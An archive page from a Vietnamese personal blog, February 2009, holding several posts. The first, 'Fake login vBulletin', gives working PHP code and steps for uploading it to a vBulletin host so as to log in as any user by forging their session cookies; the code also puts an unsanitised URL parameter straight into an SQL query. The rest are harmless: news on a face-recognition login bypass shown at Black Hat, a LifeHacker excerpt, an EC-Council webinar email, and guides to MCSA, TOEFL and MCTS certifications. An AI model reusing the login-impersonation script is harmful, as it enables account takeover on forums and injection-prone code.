Archive

Archive for February, 2009

Fake login vBulletin

February 27, 2009 2 comments

Ta có thể login vào forum vbb với 1 nick bất kỳ bằng cách sau :

– Save đoạn code dưới dưới dạng file xxx.php, upload lên hosting.

– Chạy đường dẫn http://domain.com/forum/xxx.php?bd=username

Bùm … truy cập lại link http://domain.com/forum/index.php đã đăng nhập với nick username smile_regular

CODE :

<?php
if (isset($_GET[‘bd’]))
{
define(‘THIS_SCRIPT’, ‘login’);
require_once(‘./global.php’);
require_once(‘./includes/functions_login.php’);
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = ‘" . $_GET[‘bd’] . "’");
if (!$vbulletin->userinfo[‘userid’]) die("Invalid username!");
else
{
vbsetcookie(‘userid’, $vbulletin->userinfo[‘userid’], true, true, true);
vbsetcookie(‘password’, md5($vbulletin->userinfo[‘password’] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET[‘bd’]);
process_new_login(‘cplogin’, TRUE, TRUE);
do_login_redirect();
}
}

?>

DEMO :

picture078

picture077

Categories: HACKING - SECURITY

BKIS gây tiếng vang tại diễn đàn bảo mật Black Hat ?

February 21, 2009 Leave a comment

Hai hôm nay tôi liên tục nhận được tin nhắn nhắn từ Y!M về vụ việc BKIS tham gia Black Hat với đề tài “Your Face is NOT Your Password”, báo điện tử Vnexpress có đăng tin thế này :

———————

Nguồn : http://vnexpress.net/GL/Vi-tinh/Hacker-Virus/2009/02/3BA0B851/

Màn trình diễn lỗ hổng trong công nghệ nhận dạng khuôn mặt trên máy tính xách tay của các chuyên gia Trung tâm an ninh mạng Bkis tại Washington DC (Mỹ) đã khiến cả khán phòng ồ lên ngỡ ngàng.

Chỉ với một vài thao tác kỹ thuật, chuyên gia Nguyễn Minh Đức đã vượt qua hàng rào bảo vệ bằng công nghệ sinh học và đăng nhập thành công laptop của Asus, Lenovo, Toshiba dù chúng đã được thiết lập ở mức an ninh cao nhất. Khách tham dự đã bất ngờ bởi tính năng này vẫn được nhiều người dùng tin tưởng.

Jeff Moss, Chủ tịch Black Hat, nói: "Thật kinh ngạc khi nhận diện khuôn mặt lại có thể bị xuyên thủng một cách dễ dàng đến vậy". Một chuyên gia bảo mật khác cũng khẳng định: "Không riêng mình tôi mà tất cả mọi người đều có chung quan điểm: Thật không thể tin được”.

BkisUSA 01

"Lỗ hổng không thể khắc phục được và nhà sản xuất cần phải loại bỏ, dừng phát triển công nghệ này. Họ cũng cần đưa ra thông báo chính thức tới người dùng trên toàn cầu để ngừng sử dụng tính năng nhận diện khuôn mặt", chuyên gia Nguyễn Minh Đức khẳng định.

Còn Selven Veeraragoo, chuyên gia ngành kinh tế – tài chính tại Washington DC, tuyên bố sẽ không dùng chức năng đó nữa mà chọn mật khẩu là các ký tự và phím CapsLock.

Bkis cũng đã mô tả cách khai thác lỗ hổng trên tại một hội thảo diễn ra ở Hà Nội đầu tháng 12/2008.

Công nghệ nhận diện khuôn mặt được Asus, Lenovo và Toshiba cung cấp sẵn trong bộ phần mềm chuyên dụng đi kèm máy và đưa vào tất cả các dòng laptop có webcam chạy trên hệ điều hành Windows Vista và XP. Chủ nhân, thay vì phải gõ mật khẩu hoặc xác thực bằng vân tay, chỉ cần ngồi trước máy tính là đã có thể đăng nhập được. Đây từng được coi là tính năng nổi trội, giúp ngăn chặn người khác tiếp cận máy tính trái phép, đảm bảo an toàn thông tin cho chủ nhân.

———————

Và tôi cũng tìm thấy một thủ thuật tương tự được viết từ 12-07-2007 trên trang của nhóm LifeHacker smile_regular

———————

Nguồn : http://lifehacker.com/software/featured-windows-download/add-face-recognition-login-with-bananascreen-277812.php

Add face recognition login with BananaScreen

bananascreen 1

Windows only: Like the future? Freeware application BananaScreen adds face recognition login to your webcam-enabled Windows computer. To use, just install BananaScreen and create a face model. Then set up BananaScreen to lock after a predefined amount of inactivity (or hit Alt-L to lock at any time). Once locked, BananaScreen will keep an eye on faces coming and going in front of the camera. When it matches yours, it immediately unlocks your computer. Cool, right?

Well… yes, but not entirely foolproof. It’s still a beta app, and I wouldn’t trust it as a truly secure solution at this point. I tried taking a picture of myself and then using the picture to log in (see screenshot), which didn’t fool BananaScreen, but a less hastily thrown together picture might work fine (it did recognize that the picture was of a face). That probably means that someone would have to make a concerted effort to break into your computer, taking pictures of you on the sly, or maybe just grabbing the family portrait. If you’re not really worried about that, this is a very fun login tool. In all of my tests it recognized my face very quickly and accurately, but if your facial login doesn’t work for some reason, you can still use your regular password.

Granted, if movies have taught us anything it’s that security measures like face recognition, retinal scans, and handprint scans can still be easily circumvented once you’ve been killed and the appropriate body part has been removed, but at that point—fine, if the RIAA is that desperate to see what I’ve been BitTorrenting, they can knock themselves out.

BananaScreen is free to download, currently Windows only (though the site claims a Mac version will be available soon). In the meantime, Mac users might want to try locking their computer when they walk away with their Bluetooth phone.

Categories: HIEU'S BLOG

EC-Council | Security Channel‏

February 20, 2009 Leave a comment

Vừa nhận được email này của EC-Council, post lên blog để bạn nào có khả năng thì đăng ký tham dự. Đăng ký FREE smile_regular

* EC-Council là một tổ chức đưa ra nhiều chứng chỉ bảo mật uy tín như :

Certified Ethical Hacker (CEH)
Computer Hacking Forensic Investigator (CHFI)
EC-Council Certified Security Analyst (ECSA)
Licensed Penetration Tester (LPT)
 … and more

————

EC-Council | Security Channel‏
From: Editor (editor@eccouncil.org)
You may not know this sender.
Sent:Friday, February 20, 2009 8:02:14 AM
To:  daoduyhieu@msn.com

ecc1

Online Conference | February 2009
The Nature of Modern Malware

EC Council has partnered with BrightTALK, to launch a series of half-day online conferences designed to bring leading experts to your desktop live and online.  To register FREE of charge to attend the upcoming event titled, "The Nature of Modern Malware", visit HERE.

Everyone can take part from anywhere!  – How does this work?
Speakers present live over the phone and push slides over the web. As an audience member you take part by watching the live conference through the EC Council/BrightTALK website. The content is broadcast through a player where you will hear the presentations, see the slides and have an opportunity to submit questions to the speaker in real time.

You’re not required to download any software, all you need to do is show up, listen and interact with the live speakers through the media player on the live day. What’s more, the whole online conference is being recorded – so if you can’t make the live day, you can log in to the online events site at a more convenient time and listen to the recorded presentations or download the slides and podcasts and listen to them on the move!

Reserve your place NOW for the launch event, February 25th at 8:10 a.m. PST / 11:10 a.m. EST/ 4:10 pm GMT to hear leading experts discuss the threat of Malware.

The benefits of these online conferences are:
– Live access to and interaction with the world’s leading experts
– Easy access via your computer (with Internet connection and flash installed)
– Archive for future viewing
– Download presentations and MP3s of the live event
– No software downloads required
– Substantial time & cost savings
– FREE Registration

For more details and to register for this online conference please visit HERE  and click the "Register" button in the upper right hand corner.

Hackers Are Ready. Are you?

EC-Council

We do not send or support spam. This email was sent to you because you are an EC-Council member or have been exclusively selected. To UNSUBSCRIBE, send a note to editor@eccouncil.org with "Unsubscribe Newsletter" in the subject field. Please contact editor@eccouncil.org if you would like to be featured in our newsletter or would like to contribute articles for publication.

 

Forward email

Safe Unsubscribe
This email was sent to daoduyhieu@msn.com by editor@eccouncil.org.
Update Profile/Email Address | Instant removal with SafeUnsubscribe™ | Privacy Policy.

EC-Council | 3819 Osuna | Albuquerque | NM | 87109

Categories: CEH

Giải mã MCSA (phần 2)

February 16, 2009 Leave a comment

Phạm vi kiến thức của MCSA

Căn cứ theo website của Microsoft, chứng chỉ MCSA dành cho “dân máy tính chuyên nghiệp” trong môi trường máy tính tương đối phức tạp của những công ty vừa và lớn. Cụ thể hơn, thí sinh đi thi MCSA nên có từ 6 tháng đến 12 tháng kinh nghiệm quản lý hệ điều hành máy chủ (mạng) và hệ điều hành máy trạm, với những đặc tính như:

  • Có từ 250 đến 5000 người sử dụng
  • Có từ ba địa điểm trở lên
  • Có từ ba domain controllers trở lên (nôm na giống như có từ ba mạng logic trở lên)
  • Có các tài nguyên và dịch vụ trên mạng, như thư tín (email), cơ sở dữ liệu, chia sẻ máy in, tường lửa, dùng chung Internet, truy cập từ xa,…
  • Có các yêu cầu về nối kết, như người dùng truy cập từ xa vào mạng, mạng nội bộ nối với Internet,…

Như vậy, chúng ta thấy có một số yếu tố vượt quá nhu cầu thực tế của các mạng tại Việt Nam. Nói cách khác, kiến thức và kỹ năng của MCSA là “hơi dư thừa” với đa số mạng máy tính tại các doanh nghiệp ở nước ta. Nhưng điều đó cũng có nghĩa là chúng ta phải học một vài phần qua mô hình mô phỏng, nghiên cứu qua tài liệu sách vở, chứ không đủ điều kiện để “luyện tay nghề” mọi thứ được học (may mắn là điều này không hạn chế người Việt Nam học và thi đậu MCSA).

Nếu các bạn chưa hề có kinh nghiệm về mạng máy tính, liệu có thể học MCSA từ đầu được không? Câu trả lời là: hoàn toàn trong tầm tay. Tuy nhiên, bạn sẽ khó đủ sức theo học những khóa theo đúng chuẩn Microsoft (khoảng 30 giờ tức 5 ngày liên tục cho một môn) vì chúng được thiết kế cho “dân chuyên nghiệp”. Bạn nên theo học các khóa học được kéo dãn ra, nhằm giúp chúng ta đủ thời gian “tiêu hóa” lượng kiến thức lớn và thực tập các kỹ năng. Hầu hết các khóa học hiện nay tại Hà Nội và T.P. Hồ Chí Minh đều theo hình thức này.

Nhưng cũng cần lưu ý, việc học tập có thể giúp bạn trang bị những kiến thức tương đương như một người có kinh nghiệm, nhưng không có chương trình đào tạo nào giúp bạn có được những “trải nghiệm” thực tế (dự đoán và xử lý hỏng hóc, áp lực thời gian, làm việc nhóm,..). Các khóa học tốt chỉ có thể rút ngắn khoảng cách giữa sách vở và thực tiễn mà thôi. Nếu bạn học và thi đậu MCSA, là một nền tảng thuận lợi để làm việc, nhưng không có nghĩa là bạn đã “thông thạo” mọi điều về quản trị mạng Microsoft.

Những điều cần lưu ý

Điều đầu tiên bạn cần nắm rõ là chuyện tự học. Vì nội dung học MCSA có khá nhiều kiến thức và kỹ năng đòi hỏi quá trình thực tập phải có nhiều máy để nối mạng, phải có đường truyền Internet, phải có hệ thống truy cập từ xa,… cho nên bạn hầu như rất khó tự học tại nhà chỉ với một máy tính (Nếu bạn luyện thi chỉ nhằm để đậu thì cũng chưa chắc làm việc được). Ngược lại, khi theo học bất kỳ khóa nào, bạn cũng phải tự học (đọc sách và luyện tập) thật nhiều, nếu không bạn sẽ không hấp thụ hết lượng kiến thức được chuyển tải.

Một điều cần nhớ khác, đó là chứng chỉ MCSA gắn liền với công nghệ cụ thể (ví dụ Windows Server 2003). Khi Microsoft đưa ra công nghệ mới, bạn phải.. tiếp tục cập nhật để tồn tại. Mặc dù chứng chỉ MCSA không bị “hết hạn”, nhưng nhà tuyển dụng sẽ yêu cầu bạn đưa “transcript” (bản mô tả chi tiết về kết quả thi) để biết chắc bạn thông thạo công nghệ nào.

Đối với Microsoft, xem như bạn đã khá rành về hệ thống máy đơn, và cũng đã có chút kinh nghiệm về mạng nội bộ trước khi bắt đầu học về MCSA. Cho nên nếu bạn thiếu kiến thức đó, phải đảm bảo tự bạn hoặc nơi đào tạo phải trang bị phần kiến thức nền ấy. Ngoài ra, bạn cũng phải có khả năng đọc được tài liệu bằng tiếng Anh. Vài nơi yêu cầu chứng chỉ A hoặc B quốc gia, nhưng thật ra cũng không hoàn toàn chính xác, quan trọng nhất là khả năng đọc hiểu.

Hy vọng sẽ sớm có thêm nhiều MCSA để đáp ứng nhu cầu ngày càng tăng về quản trị mạng.

get-mcsa

Nguồn : bangcapquocte.com

Giải mã MCSA (phần 1)

February 16, 2009 Leave a comment

Nhiều người đã từng nghe nói đến MCP (Microsoft Certified Professional), nhưng vẫn còn khá nhiều người chưa biết MCSA là gì, “mặt mũi” ra sao? Bài viết này xin phác họa vài nét về chứng chỉ này nhằm giúp bạn đọc có thêm thông tin.

Nhiều “tracks” và “specializations”

Trên website của Microsoft, MCSA (Microsoft Certified Systems Administrator) được giới thiệu là “chứng chỉ giúp nâng cao sự nghiệp của bạn thông qua việc khẳng định bạn có đủ kỹ năng để quản lý và chẩn đoán hỏng hóc những hệ thống chạy hệ điều hành Windows”. Nói nôm na, MCSA là chứng chỉ xác nhận khả năng quản trị mạng (của Microsoft). Hiện nay, bạn có hai chọn lựa về công nghệ (theo hệ điều hành): Windows 2000 hoặc Windows Server 2003.

Ứng với hai công nghệ nêu trên, bạn có hai “nhánh” (track) MCSA, mỗi nhánh yêu cầu những môn thi khác nhau. Mặc dù Microsoft vẫn công nhận “MCSA on Windows 2000”, nhưng có lẽ các bạn nên nhắm đến công nghệ mới hơn, vì bản thân chính Windows Server 2003 chẳng bao lâu nữa cũng trở thành “lạc hậu”. Do đó, chúng tôi không đi sâu giới thiệu “nhánh” cũ.

Nhánh “MCSA on Windows Server 2003” có ba hướng: MCSA “tổng quát” (gọi tắt là MCSA), MCSA chuyên biệt về truyền tin (gọi là MCSA: Messaging), MCSA chuyên biệt về bảo mật (gọi là MCSA: Security). Những hướng chuyên biệt (specialization) nhằm xác định những kỹ năng thuộc một lĩnh vực chuyên sâu nhất định, đồng thời phục vụ nhu cầu thực tế đang cần những chuyên gia thông thạo các kỹ năng ấy.

Để lấy được chứng chỉ MCSA, bạn phải thi đậu bốn môn thi:

  • Hai môn thuộc nhóm “Networking System”: gồm Exam 70–290 (Managing and Maintaining a Microsoft Windows Server 2003 Environment) và Exam 70–291 (Implementing, Managing, and Maintaining a Microsoft Windows Server 2003 Network Infrastructure)
  • Một môn thuộc nhóm “Client Operating System”: là Exam 70–270 (Installing, Configuring, and Administering Microsoft Windows XP Professional)
  • Một môn tự chọn (gọi là elective exam), bạn có thể chọn môn về ISA Server hoặc SQL Server hoặc Exchange Server đều được.

Tên các môn thi khá dài, do đó mã số từng môn thường được dùng thay cho tên. Ngoài ra, bạn có thể dùng chứng chỉ MCDST hoặc cặp chứng chỉ A+ và Network+ của CompTIA để thay thế cho môn tự chọn (xem thêm tại http://www.microsoft.com/learning/mcp/mcsa/windows2003). Lệ phí thi tại Việt Nam hiện nay là 50USD/môn, vậy ít nhất bạn phải chi 200 USD để thi MCSA (với điều kiện là không.. rớt lần nào).

MCSA: Messaging yêu cầu bạn thi đậu bốn môn tương tự như MCSA “tổng quát”, riêng môn tự chọn thì bạn không được.. tự chọn nữa, mà phải thi Exam 70-284 (Implementing and Managing Microsoft Exchange Server 2003). Chứng chỉ này xác nhận bạn không chỉ đủ khả năng của một MCSA mà còn thông thạo về máy chủ phục vụ thư điện tử (mail server).

Riêng anh chàng MCSA: Security đòi hỏi nhiều hơn: bạn phải thi năm môn, trong đó ba môn đầu giống MCSA. Hai môn “tự chọn” phải là: Exam 70-299 (Implementing and Administering Security in a Microsoft Windows Server 2003 Network) và Exam 70-227 (Installing, Configuring, and Administering Microsoft Internet Security and Acceleration Server 2000). Quả thật cụm từ “môn tữ chọn” không còn đúng trong trường hợp này nữa.

Nhu cầu thực tế về MCSA

Nhiều bạn rất bối rối trước một rừng thông tin về chứng chỉ của Microsoft. Xin nói ngay: nếu bạn quan tâm đến lĩnh vực quản trị mạng thì chỉ cần tìm hiểu về MCP (mạng), MCSA và MCSE. Khi bạn thi đậu môn đầu tiên (để đạt được MCSA hay MCSE), bất kể đó là môn nào, bạn cũng được công nhận là MCP. Như vậy, cấp độ MCP không đủ cho những người thật sự quản trị một/nhiều mạng quy mô vừa và lớn.

Mặc dù đa số các bạn khi theo học đều muốn “đi đến cùng” – tức trở thành MCSE – nhưng điều đó không cần thiết cho số đông. Công việc hiện nay các nhà tuyển dụng đang cần nhiều đòi hỏi kỹ năng của MCSA, và khả năng ấy là “đủ xài”. Thực tế chỉ cần một số lượng MCSE không lớn, vì các doanh nghiệp cần người “quản trị” nhiều hơn là người “thiết kế” mạng.

(Còn tiếp)

Nguồn : bangcapquocte.com

Các dạng thi TOEFL

February 16, 2009 Leave a comment

TOEFL trên Internet (iBT)

Đây là bài thi TOEFL thế hệ mới, sử dụng Internet để chuyển đề thi từ ETS về đến trung tâm tổ chức thi. Kể từ khi được giới thiệu vào cuối năm 2005, TOEFL iBT đang từng bước thay thế hoàn toàn dạng thi trên giấy (PBT) và dạng thi trên máy tính (CBT). Kỳ thi đã được tổ chức ở các quốc gia Mỹ, Canada, Pháp, Đức và Ý vào năm 2005 và các quốc gia khác vào năm 2006.

Bài thi TOEFL kéo dài trong 4 giờ và gồm có 4 phần, đòi hỏi thí sinh phải sử dụng thành thạo 4 kỹ năng. Nội dung của bài thi tập trung vào việc sử dụng tiếng Anh trong môi trường đại học hoặc cao học. Trong khi làm bài thí sinh có thể ghi chú.

  1. Nghe: khoảng 34-50 câu hỏi, kéo dài từ 50-90 phút.
    Có hai hình thức của bài nghe: dạng bài thi dài và ngắn. Ở dạng thi dài, thí sinh sẽ phải nghe và trả lời câu hỏi cho 3 đoạn hội thoại và 6 bài giảng văn. Dạng thi ngắn gồm 2 đoạn hội thoại và 4 bài giảng.

    Nội dung các bài nghe lấy trong bối cảnh của một trường đại học hay cao đẳng ở một nước nói tiếng Anh.
  2. Nói: gồm 6 bài nói.
    2 bài đầu là hình thức bài nói riêng (Independent Task) về một đề tài quen thuộc trong xã hội và sinh hoạt hằng ngày. Thí sinh có 45 giây để nói.

    4 bài nói tiếp theo là bài nói tích hợp (Integrated Task). Thí sinh phải nghe một đoạn hội thoại hay một bài thuyết giảng và sau đó trả lời dựa theo câu hỏi đưa ra có liên quan đến đoạn hội thoại hay bài thuyết giảng. Ờ phần này, thí sinh có 60 giây để nói.
  3. Đọc: cũng có hai hình thức là dài và ngắn.
    Ở dạng dài, thí sinh sẽ trả lời câu hỏi về 5 bài đọc trích từ các sách giáo khoa của trường đại học hoặc cao đẳng ở Bắc Mỹ. Ở dạng ngắn, thí sinh phải trả lời câu hỏi về 3 bài đọc cũng có độ dài từ 700-750 từ nhưng với thời gian ngắn hơn là 60 phút (so với 100 phút của dạng dài).
  4. Viết: gồm 2 bài viết.
    Bài thứ nhất là dạng Integrated Task. Thí sinh phải đọc một đoạn văn sau đó nghe một bài thuyết giảng rồi tóm tắt lại và nêu mối quan hệ giữa đoạn văn và bài thuyết giảng. Bài viết phải vào khoảng 150-225 từ. Thí sinh có 20 phút để viết.

    Bài thứ hai là dạng Independant Task về một đề tài trong xã hội. Bài viết phải vào khoảng 300-350 từ. Thí sinh có 35 phút để viết.

TOEFL trên máy tính (CBT)

TOEFL trên máy tính (CBT) được tổ chức đầu tiên vào ngày 30 tháng 9 năm 2006. Bài thi cũng được chia ra làm 4 phần : nghe, cầu trúc ngữ pháp, đọc hiểu và viết. Trong lúc làm bài thí sinh không được phép ghi chú.

  1. Phần nghe (45-70 phút).
    gồm 2 dạng: thí sinh sẽ nghe những đoạn đối thoại giữa 2 hoặc nhiều người trong lớp học hoặc trong trường đại học; hoặc những mẫu đối thoại giữa sinh viên với giảng viên. Các câu hỏi thường là dạng : ai, chủ đề của câu chuyệnở đâu.
  2. Phần ngữ pháp (15-20 phút).
    thường là dạng nhận định chỗ sai trong câu và điền từ thích hợp vào chỗ trống.
  3. Phần đọc hiểu (70-90 phút).
    Thí sinh sẽ đọc đoạn văn và trả lời các câu hỏi liên quan, thường là các dạng như: chủ đề của đoạn văn, các câu hỏi liên quan đến tác giả, các ý kiến được suy ra từ nội dung của đoạn văn…
  4. Phần viết bài luận (30 phút).
    Viết một bài luận về một chủ đề thông thường và nêu ra quản điểm chủ quan của thí sinh về chủ đề đó.
Bài thi TOEFL trên máy tính (CBT) được lập trình trước để mức độ khó-dễ của câu hỏi sẽ phụ thuộc vào sự trả lời của thí sinh đối với những câu hỏi trước.
Điểm số sẽ được chấm thành 3 phần theo thang điểm 0-30: nghe, đọc hiểu-ngữ pháp (gộp chung) và viết. 3 phần điểm sau đó được qui đổi thành điểm cuối cùng với thang điểm từ 0-300. Điểm viết sẽ được cho biết riêng theo thang điểm 0-6.

TOEFL trên giấy

Đây là dạng thi TOEFL cũ. Dạng này hầu như đã không còn được sử dụng trừ những khu vực không có điều kiện để thi iBT hoặc CBT. Cấu trúc bài thi PBT cũng tương tự như bài thi PBT chỉ có số câu hỏi nhiều hơn và thang điểm rộng hơn. Thang điểm tổng kết của TOEFL PBT là từ 310-677 và được qui đổi từ 3 cột điểm: nghe (31-68), ngữ pháp (31-68) và đọc (31-67). Khác với CBT, điểm phần viết (TWE – Test of Written English) không được tính vào điểm tổng kết mà được cho riêng biệt với thang điểm từ 0-6.

[nguồn: Wikipedia]

Bạn có muốn trở thành chuyên viên công nghệ Microsoft?

February 14, 2009 Leave a comment

Như trước đây Tạp chí e-Chíp đã đưa tin nhiều lần về thế hệ chứng chỉ mới của Microsoft, hiện nay sự quan tâm của thị trường đã bắt đầu có tín hiệu tăng dần. Bài viết này hy vọng có thể cung cấp thêm thông tin cho các nhà đào tạo, tuyển dụng và nhất là người học, người thi đang muốn “sở hữu” chứng nhận quốc tế.

mcts-logo

MCTS – chìa khóa mới để trở thành chuyên gia

Chứng chỉ MCTS (Microsoft Certified Technology Specialist) là chứng chỉ mới của Microsoft, xác nhận kiến thức chuyên sâu và kỹ năng tinh thông về một lĩnh vực nhất định trong công nghệ Microsoft. Cụ thể hiện nay có 5 nhánh sau:

  • Technology Specialist: .NET Framework 2.0 Web Applications
  • Technology Specialist: .NET Framework 2.0 Windows Applications
  • Technology Specialist: .NET Framework 2.0 Distributed Applications
  • Technology Specialist: SQL Server 2005
  • Technology Specialist: BizTalk Server 2006

Chứng chỉ đầu tiên MCTS: .NET Framework 2.0 Web Applications tập trung vào môi trường Dot Net và phát triển ứng dụng phía máy trạm trên nền web. Bạn cần thi hai môn:

  • Exam 70–536: TS: Microsoft .NET Framework 2.0 – Application Development Foundation (chọn một trong ba ngôn ngữ: Microsoft Visual Basic 2005, Microsoft Visual C# 2005, Microsoft Visual C++ 2005)
  • Exam 70–528: TS: Microsoft .NET Framework 2.0 – Web-Based Client Development (chọn một trong hai ngôn ngữ: Microsoft Visual Basic 2005 và Microsoft Visual C# 2005)

Tương tự, MCTS: .NET Framework 2.0 Windows Applications cũng yêu cầu hai môn thi, môn đầu 70-636 (đã nêu trên) và môn:

  • Exam 70–526: TS: Microsoft .NET Framework 2.0 – Windows-Based Client Development (chọn một trong ba ngôn ngữ: Microsoft Visual Basic 2005, Microsoft Visual C# 2005, Microsoft Visual C++ 2005)

Tiếp theo là chứng chỉ MCTS: .NET Framework 2.0 Distributed Applications, cũng giống hai chứng chỉ trên: bạn cần thi môn 70-536 và:

  • Exam 70–529: TS: Microsoft .NET Framework 2.0 – Distributed Application Development (chọn một trong hai ngôn ngữ: Microsoft Visual Basic 2005 và Microsoft Visual C# 2005)

Đó là ba chứng chỉ về ngành lập trình. Nếu bạn đã có MCSD thì bạn có thể thi thẳng lên MCPD (Microsoft Certified Professional Developer) mà không cần qua MCTS nữa. Chứng chỉ MCTS tiếp theo thuộc về ngành cơ sở dữ liệu. MCST: SQL Server 2005 tập trung sâu vào phần mềm quản trị dữ liệu SQL Server 2005, chỉ yêu cầu bạn thi một môn mà thôi. Công việc chính của những ai có chứng chỉ này là database administrator, database developer, hoặc business intelligence developer. Môn thi là Exam 70–431: TS: Microsoft SQL Server 2005 – Implementation and Maintenance.

Chứng chỉ MCTS còn lại là MCTS: BizTalk Server 2006, tập trung vào phần mềm BizTalk Server 2006. Thí sinh cần thi đậu một môn là Exam 70–235: TS: Developing Business Process and Integration Solutions Using BizTalk Server 2006.

Một số môn thi mới

Giữa tháng 3 vừa qua, Microsoft vừa đưa ra thêm một số kỳ thi có liên quan đến những chứng chỉ này. Chẳng hạn môn thi “UPGRADE: MCDBA Skills to MCITP Database Administrator by Using SQL Server 2005” (mã số Exam 70-447) dành cho các MCDBA muốn nhanh chóng đạt được chứng chỉ “MCITP: Databased Administrator”.

Các bạn có thể thường xuyên kiểm tra môn thi mới tại địa chỉ http://www.microsoft.com/learning/mcpexams/status/new.asp để nắm thông tin cập nhật. Những chi tiết về nội dung bài thi, các phần kiến thức cần nắm cũng như sách tham khảo về MCTS có liệt kê tại http://www.microsoft.com/learning/mcp/mcts. Chúc bạn đọc sớm trở thành chuyên viên công nghệ (technology specialist) do chính Microsoft công nhận.

Nguồn: Tạp chí eChip